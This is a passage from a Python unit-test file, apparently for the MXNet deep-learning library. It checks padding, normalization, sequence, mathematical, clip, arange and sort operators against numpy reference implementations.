# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_device()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_device())
check_instance_norm_with_shape((2, 1, 2), default_device())
check_instance_norm_with_shape((2,4,5,6), default_device())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_device())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_device()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_device()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_device()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_device()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_device(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_device(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_device()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
